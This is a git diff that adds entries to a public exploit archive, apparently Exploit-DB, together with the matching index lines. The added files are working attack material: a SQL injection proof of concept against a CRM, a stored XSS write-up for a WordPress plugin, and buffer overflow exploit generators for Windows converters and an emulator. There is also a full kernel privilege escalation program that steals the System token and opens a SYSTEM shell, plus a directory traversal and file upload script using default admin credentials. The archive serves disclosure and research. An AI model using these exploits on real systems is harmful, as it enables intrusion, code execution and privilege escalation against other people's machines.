immediately, filtering (by custom + servlet filter, IPS, WAF and so on) can be a mitigation solution for + this vulnerability. Some points about filtering solution are listed + below. + + - Both %{expr} and ${expr} notation can be used for attacks. + - Parameters both in querystring and in request body can be used. + - redirect: and redirectAction: can be used not only for Java method + execution but also for open redirect. + + See S2-017 (CVE-2013-2248) for open redirect issue. + https://struts.apache.org/release/2.3.x/docs/s2-017.html + +Reference: + https://struts.apache.org/release/2.3.x/docs/s2-016.html + https://cwiki.apache.org/confluence/display/WW/ActionMapper \ No newline at end of file diff --git a/exploits/php/webapps/43347.txt b/exploits/php/webapps/43347.txt new file mode 100644 index 000000000..b997a2be2 --- /dev/null +++ b/exploits/php/webapps/43347.txt @@ -0,0 +1,48 @@ +# Exploit Title: [Ciuis CRM v 1.0.7 Sql Injection] +# Google Dork: [if applicable] +# Date: [12/15/2017] +# Exploit Author: [Zahid Abbasi] +# Contact: http://twitter.com/zahidsec +# Website: http://zahidabbasi.com +# Vendor Homepage: [http://ciuis.com/] +# Software Link: [https://codecanyon.net/item/ciuis-crm/20473489] +# Version: [1.0.7] (REQUIRED) +# Tested on: [Win 7 64-bit] +# CVE : [if applicable] + +1. Description + +The injection required user registration on CIUS CRM. Old versions have +not been tested but it's a guess, they are also vulnerable. +The URL path filename appears to be vulnerable to SQL injection attacks. +The payload 65079277 or 7647=07647 was submitted in the URL path +filename, and a database error message was returned. +You should review the contents of the error message, and the +application's handling of other input, to confirm whether a +vulnerability is present. + +2. Proof of Concept + +The live testing was done on demo site of the script. +https://ciuis.com/demo/accounts/account/4 [URL path filename] +Request:- +GET /demo/accounts/account/465079277%20or%207647%3d07647 HTTP/1.1 +Host: ciuis.com +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) +Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: ci_session=98b5ef21cb2d123fb376f135218129226808fbec +Connection: close +Upgrade-Insecure-Requests: 1 +Response:- +After placing our injection code and forwarding the request. The html +response is posted below. +
+

A Database Error Occurred

+

Error Number: 1064

You have an error in your SQL syntax; +check the manual that corresponds to your MariaDB server version for the +right syntax to use near 'and `transactiontype` =0)' at line +3

SELECT SUM(`amount`) AS `amount` +-- \ No newline at end of file diff --git a/exploits/php/webapps/44409.txt b/exploits/php/webapps/44409.txt new file mode 100644 index 000000000..0e9f0227b --- /dev/null +++ b/exploits/php/webapps/44409.txt @@ -0,0 +1,45 @@ +# Exploit Title : Activity Log Wordpress Plugin Stored Cross Site Scripting (XSS) +# Date: 25-02-2018 +# Exploit Author : Stefan Broeder +# Contact : https://twitter.com/stefanbroeder +# Vendor Homepage: https://pojo.me +# Software Link: https://wordpress.org/plugins/aryo-activity-log/ +# Version: 2.4.0 +# CVE : CVE-2018-8729 +# Category : webapps + +Description +=========== +Activity Log is a WordPress plugin which tracks site activity. It has more than 70.000 active installations. Version 2.4.0 (and possibly the previous ones) are affected by several Stored XSS vulnerabilities. + +Vulnerable part of code +======================= +Storing the payload: +File: aryo-activity-log/hooks/class-aal-hook-attachment.php:14. The log entry that is stored contains the result of get_the_title($post->ID), which can include HTML and is not sanitized by WordPress. +File: aryo-activity-log/hooks/class-aal-hook-comments.php:14. The log entry that is stored contains the result of get_the_title($comment->comment_post_ID), which can include HTML and is not sanitized by WordPress. +File: aryo-activity-log/hooks/class-aal-hook-posts.php:7. The log entry that is stored contains the result of $title = get_the_title($post), which can include HTML and is not sanitized by WordPress. + +Displaying the payload: +File: aryo-activity-log/classes/class-aal-activity-log-list-table.php:209. $item->object_name is displayed without sanitization and can contain HTML tags. + +Impact +====== +Arbitrary JavaScript code can be run on browser side if a user is able to create a post or upload an attachment. + +Exploitation +============ +To successfully exploit this vulnerability, an attacker would have to perform any of the following: +- Create/edit/draft/publish/trash/untrash a post with JavaScript in the title +- Create/edit/trash/untrash/mark_as_spam/unmark_as_spam a comment on a post with JavaScript in the title +- Add/edit/delete an attachment with JavaScript in the attachment title + +Regular website visitors will not have the capability to do any of these, however, possible threat actors might include: +- A user with the role of ‘editor’ within WordPress (non-admins which are able to create content) +- A rogue administrator among multiple administrators +- A compromised plugin + +If the payload has been injected, then it will be executed once the Activity Log is viewed. This can possibly lead to stealing of CSRF nonces and creation of new (administrator) users on the WordPress instance. + +Solution +======== +Update to 2.4.1 \ No newline at end of file diff --git a/exploits/windows/dos/43116.py b/exploits/windows/dos/43116.py new file mode 100755 index 000000000..0d30f610c --- /dev/null +++ b/exploits/windows/dos/43116.py @@ -0,0 +1,41 @@ +#!/usr/bin/env python +# coding: utf-8 +# Exploit Title: Jnes Version 1.0.2 Stack Buffer Overflow +# Date: 3-11-2017 +# Exploit Author: crash_manucoot +# Contact: twitter.com/crash_manucoot +# Vendor Homepage: http://www.jabosoft.com/home +# Software Link: http://www.jabosoft.com/categories/3 +# Version: v1.0.2.15 +# Tested on: Windows 7 Home Premium SP1 SPANISH +# Category: Windows Local Exploit +# How to use: open the emulator load any ROM go to options - cheats - add - Pro-Action Replay +# paste the contents of the open.txt in the box

- click on ok +# you will get an error message click on ok close the cheat menu and bum + + +import struct + +fuzzing = open('open.txt','w+') + +eip = struct.pack(' +# EDX 00020000 pdmlog.00020000 +# EBX 00020000 pdmlog.00020000 +# ESP 035BFB90 +# EBP 035BFBAC +# ESI 00000002 +# EDI 00000000 +# EIP 42424242 + +# EAX 10013945 DVDPhoto.10013945 +# ECX 0002BF3B pdmlog. +# EDX 00020000 pdmlog.00020000 +# EBX 00020000 pdmlog.00020000 +# ESP 03A0FB90 +# EBP 03A0FBAC +# ESI 00000002 +# EDI 00000000 +# EIP 10013945 DVDPhoto.10013945 <- EIP Overwrite '\x45\x39\x01\x10' + +# outfile +file = "proof-of-concept.reg" + +# register re-write +padding = "\x41" * 548 +eipOffset = "\x45\x39\x01\x10" # PUSH ESP (0x10013945) +stackRewrite = "\x43" * 400 # Shellcode Space + +# generate exploit file containing above payload instructing EIP overwrite + +poc = "Windows Registry Editor Version 5.00\n\n" +poc = poc + "[HKEY_CURRENT_USER\Software\Socusoft Photo to Video Converter Free Version\General]\n" +poc = poc + "\"TempFolder\"=\"" + padding + eipOffset + stackRewrite + "\"" + +try: + print "[*] Generating exploit contents...\n"; + print "[*] Creating payload file...\n"; + writeFile = open (file, "w") + writeFile.write( poc ) + writeFile.close() + print "[*] Success!"; +except: + print "[!] ERROR!"; + +#EOF \ No newline at end of file diff --git a/exploits/windows/dos/44273.py b/exploits/windows/dos/44273.py new file mode 100755 index 000000000..5771111a2 --- /dev/null +++ b/exploits/windows/dos/44273.py @@ -0,0 +1,56 @@ +############################################################################### +# Exploit Title: Allok Video Converter - Buffer Overflow Vulnerability (Windows XP SP3) +# Date: 06-03-2018 +# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj +# Organization : TwinTech Solutions +# Vulnerable Software: Allok Video Converter +# Vendor Homepage: http://www.alloksoft.com +# Version: 4.6.1217 +# Software Link: http://www.alloksoft.com/allok_vconverter.exe +# Tested On: Windows XP Service Pack 3 (Version 2002) +# +# Credit to Velayutham Selvaraj for discovering the Vulnerbility +# Vulnerability Disclosure Date : 2018-03-06 +# +# Manual steps to reproduce the vulnerability ... +#1. Download and install the "setup(allok_vconverter.exe)" file +#2. Run this exploit code via python 2.7 +#3. A file "exploit.txt" will be created +#4. Copy the contents of the file and paste in the License Name field +# Name > exploit.txt +#5. Type some random character in License Code +#6. Click Register and voila ! +#7. Boom calculator opens +# +############################################################################## +import struct + +file = open("exploit.txt","wb") +buflen = 4000 +junk = "A" * 780 +nseh = "\x90\x90\xeb\x10" +seh = struct.pack(" 1234 + +More information: https://www.tenable.com/blog/tenable-research-advisory-critical-schneider-electric-indusoft-web-studio-and-intouch-machine \ No newline at end of file diff --git a/exploits/windows/local/44573.txt b/exploits/windows/local/44573.txt new file mode 100644 index 000000000..2cb5e72e1 --- /dev/null +++ b/exploits/windows/local/44573.txt @@ -0,0 +1,48 @@ +% a PDF file using an XFA +% most whitespace can be removed (truncated to 570 bytes or so...) +% Ange Albertini BSD Licence 2012 +% modified by InsertScript + +%PDF-1. % can be truncated to %PDF-\0 + +1 0 obj <<>> +stream + + + 1 + + + + +endstream +endobj + +trailer << + /Root << + /AcroForm << + /Fields [<< + /T (0) + /Kids [<< + /Subtype /Widget + /Rect [] + /T () + /FT /Btn + >>] + >>] + /XFA 1 0 R + >> + /Pages <<>> + >> +>> \ No newline at end of file diff --git a/exploits/windows/local/44581.c b/exploits/windows/local/44581.c new file mode 100644 index 000000000..76a3c5789 --- /dev/null +++ b/exploits/windows/local/44581.c @@ -0,0 +1,353 @@ +#include "stdafx.h" + +#define PML4_BASE 0xFFFFF6FB7DBED000 +#define PDP_BASE 0xFFFFF6FB7DA00000 +#define PD_BASE 0xFFFFF6FB40000000 +#define PT_BASE 0xFFFFF68000000000 + +typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS; + +#pragma pack(push,4) +typedef struct _CM_PARTIAL_RESOURCE_DESCRIPTOR { + UCHAR Type; + UCHAR ShareDisposition; + USHORT Flags; + union { + struct { + PHYSICAL_ADDRESS Start; + ULONG Length; + } Generic; + + struct { + PHYSICAL_ADDRESS Start; + ULONG Length; + } Port; + + struct { +#if defined(NT_PROCESSOR_GROUPS) + USHORT Level; + USHORT Group; +#else + ULONG Level; +#endif + ULONG Vector; + KAFFINITY Affinity; + } Interrupt; + + struct { + union { + struct { +#if defined(NT_PROCESSOR_GROUPS) + USHORT Group; +#else + USHORT Reserved; +#endif + USHORT MessageCount; + ULONG Vector; + KAFFINITY Affinity; + } Raw; + + struct { +#if defined(NT_PROCESSOR_GROUPS) + USHORT Level; + USHORT Group; +#else + ULONG Level; +#endif + ULONG Vector; + KAFFINITY Affinity; + } Translated; + } DUMMYUNIONNAME; + } MessageInterrupt; + + struct { + PHYSICAL_ADDRESS Start; + ULONG Length; + } Memory; + + struct { + ULONG Channel; + ULONG Port; + ULONG Reserved1; + } Dma; + + struct { + ULONG Channel; + ULONG RequestLine; + UCHAR TransferWidth; + UCHAR Reserved1; + UCHAR Reserved2; + UCHAR Reserved3; + } DmaV3; + + struct { + ULONG Data[3]; + } DevicePrivate; + + struct { + ULONG Start; + ULONG Length; + ULONG Reserved; + } BusNumber; + + struct { + ULONG DataSize; + ULONG Reserved1; + ULONG Reserved2; + } DeviceSpecificData; + + struct { + PHYSICAL_ADDRESS Start; + ULONG Length40; + } Memory40; + + struct { + PHYSICAL_ADDRESS Start; + ULONG Length48; + } Memory48; + + struct { + PHYSICAL_ADDRESS Start; + ULONG Length64; + } Memory64; + + struct { + UCHAR Class; + UCHAR Type; + UCHAR Reserved1; + UCHAR Reserved2; + ULONG IdLowPart; + ULONG IdHighPart; + } Connection; + + } u; +} CM_PARTIAL_RESOURCE_DESCRIPTOR, *PCM_PARTIAL_RESOURCE_DESCRIPTOR; +#pragma pack(pop,4) + +typedef enum _INTERFACE_TYPE { + InterfaceTypeUndefined, + Internal, + Isa, + Eisa, + MicroChannel, + TurboChannel, + PCIBus, + VMEBus, + NuBus, + PCMCIABus, + CBus, + MPIBus, + MPSABus, + ProcessorInternal, + InternalPowerBus, + PNPISABus, + PNPBus, + Vmcs, + ACPIBus, + MaximumInterfaceType +} INTERFACE_TYPE, *PINTERFACE_TYPE; + +typedef struct _CM_PARTIAL_RESOURCE_LIST { + USHORT Version; + USHORT Revision; + ULONG Count; + CM_PARTIAL_RESOURCE_DESCRIPTOR PartialDescriptors[1]; +} CM_PARTIAL_RESOURCE_LIST, *PCM_PARTIAL_RESOURCE_LIST; + +typedef struct _CM_FULL_RESOURCE_DESCRIPTOR { + INTERFACE_TYPE InterfaceType; + ULONG BusNumber; + CM_PARTIAL_RESOURCE_LIST PartialResourceList; +} *PCM_FULL_RESOURCE_DESCRIPTOR, CM_FULL_RESOURCE_DESCRIPTOR; + +typedef struct _CM_RESOURCE_LIST { + ULONG Count; + CM_FULL_RESOURCE_DESCRIPTOR List[1]; +} *PCM_RESOURCE_LIST, CM_RESOURCE_LIST; + +struct memory_region { + ULONG64 size; + ULONG64 address; +}; + +// Very hack'y way of trying to map out physical memory regions to try and reduce +// risk of BSOD +DWORD parse_memory_map(struct memory_region *regions) { + HKEY hKey = NULL; + LPTSTR pszSubKey = L"Hardware\\ResourceMap\\System Resources\\Physical Memory"; + LPTSTR pszValueName = L".Translated"; + LPBYTE lpData = NULL; + DWORD dwLength = 0, count = 0, type = 0;; + + if (!RegOpenKey(HKEY_LOCAL_MACHINE, pszSubKey, &hKey) == ERROR_SUCCESS) + { + printf("[*] Could not get reg key\n"); + return 0; + } + + if (!RegQueryValueEx(hKey, pszValueName, 0, &type, NULL, &dwLength) == ERROR_SUCCESS) + { + printf("[*] Could not query hardware key\n"); + return 0; + } + + lpData = (LPBYTE)malloc(dwLength); + RegQueryValueEx(hKey, pszValueName, 0, &type, lpData, &dwLength); + + CM_RESOURCE_LIST *resource_list = (CM_RESOURCE_LIST *)lpData; + + for (int i = 0; i < resource_list->Count; i++) { + for (int j = 0; j < resource_list->List[0].PartialResourceList.Count; j++) { + if (resource_list->List[i].PartialResourceList.PartialDescriptors[j].Type == 3) { + regions->address = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Start.QuadPart; + regions->size = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Length; + regions++; + count++; + } + } + } + + return count; +} + +int main() +{ + printf("TotalMeltdown PrivEsc exploit by @_xpn_\n"); + printf(" paging code by @UlfFrisk\n\n"); + + unsigned long long iPML4, vaPML4e, vaPDPT, iPDPT, vaPD, iPD; + DWORD done; + DWORD count; + + // Parse registry for physical memory regions + printf("[*] Getting physical memory regions from registry\n"); + struct memory_region *regions = (struct memory_region *)malloc(sizeof(struct memory_region) * 10); + + count = parse_memory_map(regions); + if (count == 0) { + printf("[X] Could not find physical memory region, quitting\n"); + return 2; + } + + for (int i = 0; i < count; i++) { + printf("[*] Phyiscal memory region found: %p - %p\n", regions[i].address, regions[i].address + regions[i].size); + } + + // Check for vulnerability + __try { + int test = *(unsigned long long *)PML4_BASE; + } + __except (EXCEPTION_EXECUTE_HANDLER) { + printf("[X] Could not access PML4 address, system likely not vulnerable\n"); + return 2; + } + + // setup: PDPT @ fixed hi-jacked physical address: 0x10000 + // This code uses the PML4 Self-Reference technique discussed, and iterates until we find a "free" PML4 entry + // we can hijack. + for (iPML4 = 256; iPML4 < 512; iPML4++) { + vaPML4e = PML4_BASE + (iPML4 << 3); + if (*(unsigned long long *)vaPML4e) { continue; } + + // When we find an entry, we add a pointer to the next table (PDPT), which will be + // stored at the physical address 0x10000 + *(unsigned long long *)vaPML4e = 0x10067; + break; + } + printf("[*] PML4 Entry Added At Index: %d\n", iPML4); + + // Here, the PDPT table is referenced via a virtual address. + // For example, if we added our hijacked PML4 entry at index 256, this virtual address + // would be 0xFFFFF6FB7DA00000 + 0x100000 + // This allows us to reference the physical address 0x10000 as: + // PML4 Index: 1ed | PDPT Index : 1ed | PDE Index : 1ed | PT Index : 100 + vaPDPT = PDP_BASE + (iPML4 << (9 * 1 + 3)); + printf("[*] PDPT Virtual Address: %p", vaPDPT); + + // 2: setup 31 PDs @ physical addresses 0x11000-0x1f000 with 2MB pages + // Below is responsible for adding 31 entries to the PDPT + for (iPDPT = 0; iPDPT < 31; iPDPT++) { + *(unsigned long long *)(vaPDPT + (iPDPT << 3)) = 0x11067 + (iPDPT << 12); + } + + // For each of the PDs, a further 512 PT's are created. This gives access to + // 512 * 32 * 2mb = 33gb physical memory space + for (iPDPT = 0; iPDPT < 31; iPDPT++) { + if ((iPDPT % 3) == 0) + printf("\n[*] PD Virtual Addresses: "); + + vaPD = PD_BASE + (iPML4 << (9 * 2 + 3)) + (iPDPT << (9 * 1 + 3)); + printf("%p ", vaPD); + + for (iPD = 0; iPD < 512; iPD++) { + // Below, notice the 0xe7 flags added to each entry. + // This is used to create a 2mb page rather than the standard 4096 byte page. + *(unsigned long long *)(vaPD + (iPD << 3)) = ((iPDPT * 512 + iPD) << 21) | 0xe7; + } + } + + printf("\n[*] Page tables created, we now have access to ~31gb of physical memory\n"); + + #define EPROCESS_IMAGENAME_OFFSET 0x2e0 + #define EPROCESS_TOKEN_OFFSET 0x208 + #define EPROCESS_PRIORITY_OFFSET 0xF // This is the offset from IMAGENAME, not from base + + unsigned long long ourEPROCESS = 0, systemEPROCESS = 0; + unsigned long long exploitVM = 0xffff000000000000 + (iPML4 << (9 * 4 + 3)); + STARTUPINFOA si; + PROCESS_INFORMATION pi; + + ZeroMemory(&si, sizeof(si)); + si.cb = sizeof(si); + ZeroMemory(&pi, sizeof(pi)); + + printf("[*] Hunting for _EPROCESS structures in memory\n"); + + for (int j = 0; j < count; j++) { + printf("[*] Trying physical region %p - %p\n", regions[j].address, regions[j].address + regions[j].size); + + for (unsigned long long i = regions[j].address; i < +regions[j].address + regions[j].size; i++) { + + __try { + // Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field + if (ourEPROCESS == 0 && memcmp("TotalMeltdownP", (unsigned char *)(exploitVM + i), 14) == 0) { + if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) { + ourEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET; + printf("[*] Found our _EPROCESS at %p\n", ourEPROCESS); + } + } + // Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field + else if (systemEPROCESS == 0 && memcmp("System\0\0\0\0\0\0\0\0\0", (unsigned char *)(exploitVM + i), 14) == 0) { + if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) { + systemEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET; + printf("[*] Found System _EPROCESS at %p\n", systemEPROCESS); + } + } + + if (systemEPROCESS != 0 && ourEPROCESS != 0) { + // Swap the tokens by copying the pointer to System Token field over our process token + printf("[*] Copying access token from %p to %p\n", systemEPROCESS + EPROCESS_TOKEN_OFFSET, ourEPROCESS + EPROCESS_TOKEN_OFFSET); + *(unsigned long long *)((char *)ourEPROCESS + EPROCESS_TOKEN_OFFSET) = *(unsigned long long *)((char *)systemEPROCESS + EPROCESS_TOKEN_OFFSET); + printf("[*] Done, spawning SYSTEM shell...\n\n"); + + CreateProcessA(0, + "cmd.exe", + NULL, + NULL, + TRUE, + 0, + NULL, + "C:\\windows\\system32", + &si, + &pi); + break; + } + } + __except (EXCEPTION_EXECUTE_HANDLER) { + printf("[X] Exception occured, stopping to avoid BSOD\n"); + return 2; + } + } + } + return 0; +} \ No newline at end of file diff --git a/exploits/windows/remote/44582.txt b/exploits/windows/remote/44582.txt new file mode 100644 index 000000000..0aacf54f1 --- /dev/null +++ b/exploits/windows/remote/44582.txt @@ -0,0 +1,11 @@ +A few years ago, I became aware of a security issue in most Call of Duty games. +Although I did not discover it myself, I thought it might be interesting to see what it could be used for. + +Without going into detail, this security issue allows users playing a Call of Duty match to cause a buffer overflow on the host’s system inside a stack-allocated buffer within the game’s network handling. +In consquence, this allows full remote code execution! + +The code has been published as the vulnerability used has been patched on all cod games as of 4/26/2018. + +For more information, read the post at https://momo5502.com/blog/?p=34 + +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44582.zip \ No newline at end of file diff --git a/exploits/windows/webapps/44390.py b/exploits/windows/webapps/44390.py new file mode 100755 index 000000000..d33aeb424 --- /dev/null +++ b/exploits/windows/webapps/44390.py @@ -0,0 +1,72 @@ +''' +Tittle: LifeSize ClearSea 3.1.4 Directory Traversal Vulnerabilities +Author: rsp3ar +Impact: Remote Code Execution (Post-Authentication) +Recommendation: Use strong password for default 'admin' user and secure management access to the device. Please consult vendor for replacement/alternative solutions. +Timeline: +- 01.29.2018: Open Case 00302227 to notify the vulnerabilities. +- 01.30.2018: Got notified product is EoL as Jan 14 2017 and no longer supported. +- 02.05.2018: Open Case 00302876 to notify the intention of disclosure. +- 03.02.2018: Notify the tentative date for disclosure. +- 03.07.2018: Contacted by LifeSize and discussed the detail of vulnerabilities & discloure. +- 03.31.2018: Public Disclosure + + +Description +======================================== +LifeSize ClearSea is a client/server solution for desktop and mobile video collaboration. + +Version 3.1.4 has been End of Life since Jan 14 2017, and suffers from directory traversal +vulnerabilities. After authenticated as admin on Control Panel, attacker will be able to +1) Download arbitrary file; 2) Upload arbitrary file (leading to code execution). + +1. Arbitrary file (boot.ini) download via directory traversal vulnerabilities +http://x.x.x.x:8800/smartgui/media/ClearSea/smartgui/media/ClearSea/?guiID=CDRS_BROWSE_GRID&actionID=DownloadAll&rowIDs=../../../../../../../../../boot.ini +http://x.x.x.x:8800/smartgui/media/ClearSea/smartgui/media/ClearSea/?guiID=LOGS_BROWSE_GRID&actionID=DownloadAll&rowIDs=../../../../../../../../../boot.ini + +2. Arbitrary file upload +Below POC will create test.txt under C:\ +''' +#!/usr/bin/env python + +import sys +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'RSA+AESGCM:RSA+AES:RC4-SHA' +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# Update target URL and credentials +TARGET = "http://127.0.0.1:8800/" +USERNAME = "admin" +PASSWORD = "admin" + +LOGIN_PATH = "smartgui/" +UPLOAD_PATH = "smartgui/upload/-m-ClearSea-c-DHP_PKG_UPLOAD_FORM-w-filename/cfcyvcffiv/" +TEST_FILE_NAME = "test.txt" + +print("[*] Authenticate with %s..." % (TARGET)) +cookies = {} +# Get rootSessionID +r = requests.get(TARGET, verify=False) +cookies["rootSessionID"] = r.cookies["rootSessionID"] +# Get smartguiSessionID +auth_data = { + "smartGuiAuthenticate": "t", + "email": USERNAME, + "password": PASSWORD +} +r = requests.post(TARGET + LOGIN_PATH, data = auth_data, cookies = cookies, verify=False) +if r.cookies.get("smartguiSessionID") == None: + print("[!] Invalid Username or Password") + sys.exit() +cookies["smartguiSessionID"] = r.cookies["smartguiSessionID"] +print("[*] Authentication is successful!") + +print("[*] Create remote file C:\\%s..." % (TEST_FILE_NAME)) +files = { + "SmartGuiUploadField": (TEST_FILE_NAME, "This is a test file") +} +r = requests.post(TARGET + UPLOAD_PATH + "..\\" * 8 + TEST_FILE_NAME, files = files, + cookies = cookies, verify=False) +if r.status_code == requests.codes.ok: + print("[*] Remote file C:\\%s has been successfully created" % (TEST_FILE_NAME)) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6996df1aa..fd47333cf 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5799,6 +5799,7 @@ id,file,description,date,author,type,platform,port 42970,exploits/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap Buffer Overflow",2017-10-10,"Agostino Sarubbo",dos,linux, 42962,exploits/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",dos,windows, 42969,exploits/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",dos,multiple, +44273,exploits/windows/dos/44273.py,"Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 - Buffer Overflow",2018-03-12,"Mohan Ravichandran",dos,windows, 42994,exploits/windows/dos/42994.txt,"Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution",2017-09-28,"Eduardo Braun Prado",dos,windows, 42995,exploits/windows/dos/42995.txt,"Microsoft Excel - OLE Arbitrary Code Execution",2017-09-30,"Eduardo Braun Prado",dos,windows, 42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows, @@ -5815,6 +5816,7 @@ id,file,description,date,author,type,platform,port 43060,exploits/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge < 2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",dos,windows, 43111,exploits/multiple/dos/43111.py,"GraphicsMagick - Memory Disclosure / Heap Overflow",2017-11-03,SecuriTeam,dos,multiple, 43115,exploits/windows/dos/43115.py,"Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)",2017-11-03,"Kevin McGuigan",dos,windows, +43116,exploits/windows/dos/43116.py,"Jnes 1.0.2 - Stack Buffer Overflow",2017-11-03,crash_manucoot,dos,windows, 43119,exploits/hardware/dos/43119.py,"Debut Embedded HTTPd 1.20 - Denial of Service",2017-11-02,z00n,dos,hardware, 43120,exploits/windows/dos/43120.txt,"Avaya IP Office (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,dos,windows, 43124,exploits/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,dos,windows, @@ -5853,6 +5855,7 @@ id,file,description,date,author,type,platform,port 43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)",2017-11-30,Bindecy,dos,linux, 43469,exploits/windows/dos/43469.js,"Microsoft Edge Chakra JIT - Escape Analysis Bug",2018-01-09,"Google Security Research",dos,windows, 43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows, +43208,exploits/windows/dos/43208.py,"Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow",2017-12-01,ret2eax,dos,windows, 43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows, 43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple, 43234,exploits/linux/dos/43234.c,"Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free",2017-12-07,"Mohamed Ghannam",dos,linux, @@ -5878,6 +5881,7 @@ id,file,description,date,author,type,platform,port 44183,exploits/linux/dos/44183.py,"Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060 44184,exploits/linux/dos/44184.py,"Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption",2018-02-27,EnableSecurity,dos,linux,5060 44189,exploits/windows/dos/44189.py,"Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service",2018-02-27,"Nabeel Ahmed",dos,windows, +44190,exploits/linux/dos/44190.py,"netek 0.8.2 - Denial of Service",2018-02-27,"Lawrence Amer",dos,linux, 44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware, 44211,exploits/freebsd_x86-64/dos/44211.c,"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64, 44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64, @@ -5926,6 +5930,7 @@ id,file,description,date,author,type,platform,port 44427,exploits/multiple/dos/44427.txt,"WebKit - WebAssembly Parsing Does not Correctly Check Section Order",2018-04-09,"Google Security Research",dos,multiple, 44428,exploits/linux/dos/44428.txt,"CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure",2018-04-09,"RedTeam Pentesting",dos,linux, 44442,exploits/multiple/dos/44442.js,"Google Chrome V8 JIT - 'LoadElimination::ReduceTransitionElementsKind' Type Confusion",2018-04-10,"Google Security Research",dos,multiple, +44451,exploits/hardware/dos/44451.py,"Cisco Smart Install - Crash (PoC)",2018-03-29,embedi,dos,hardware, 44456,exploits/hardware/dos/44456.py,"Barco ClickShare CSE-200 - Remote Denial of Service",2018-04-16,"Florian Hauser",dos,hardware,7100 44458,exploits/windows/dos/44458.cpp,"Microsoft Windows - 'nt!NtQueryFullAttributesFile' Kernel Stack Memory Disclosure",2018-04-16,"Google Security Research",dos,windows, 44459,exploits/windows/dos/44459.cpp,"Microsoft Windows - 'nt!NtQueryAttributesFile' Kernel Stack Memory Disclosure",2018-04-16,"Google Security Research",dos,windows, @@ -5958,6 +5963,8 @@ id,file,description,date,author,type,platform,port 44561,exploits/macos/dos/44561.txt,"Apple macOS 10.13.2 - Double mach_port_deallocate in kextd due to Failure to Comply with MIG Ownership Rules",2018-04-30,"Google Security Research",dos,macos, 44562,exploits/multiple/dos/44562.c,"Apple macOS/iOS - ReportCrash mach port Replacement due to Failure to Respect MIG Ownership Rules",2018-04-30,"Google Security Research",dos,multiple, 44566,exploits/multiple/dos/44566.html,"WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free",2018-05-02,"Google Security Research",dos,multiple, +44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows, +44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 